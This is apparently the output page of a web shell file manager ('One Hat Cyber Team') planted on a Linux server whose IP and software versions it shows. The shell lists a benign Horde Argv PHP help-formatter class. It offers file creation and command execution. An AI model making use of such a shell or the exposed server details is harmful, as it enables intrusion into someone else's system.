⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.78
Server IP:
41.128.143.86
Server:
Linux host.raqmix.cloud 6.8.0-1025-azure #30~22.04.1-Ubuntu SMP Wed Mar 12 15:28:20 UTC 2025 x86_64
Server Software:
Apache
PHP Version:
8.3.23
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
share
/
psa-pear
/
pear
/
php
/
Horde
/
Argv
/
View File Name :
IndentedHelpFormatter.php
* @author Mike Naberezny
* @license http://www.horde.org/licenses/bsd BSD * @category Horde * @package Argv */ /** * Format help with indented section bodies. * * @category Horde * @package Argv * @author Chuck Hagenbuch
* @author Mike Naberezny
* @copyright 2010-2017 Horde LLC * @license http://www.horde.org/licenses/bsd BSD */ class Horde_Argv_IndentedHelpFormatter extends Horde_Argv_HelpFormatter { public function __construct( $indent_increment = 2, $max_help_position = 24, $width = null, $short_first = true, $color = null ) { parent::__construct( $indent_increment, $max_help_position, $width, $short_first, $color ); } public function formatUsage($usage) { return sprintf( $this->highlightHeading(Horde_Argv_Translation::t("Usage:")) . " %s\n", $usage ); } public function formatHeading($heading) { return $this->highlightHeading(sprintf( '%' . $this->current_indent . "s%s:\n", '', $heading )); } }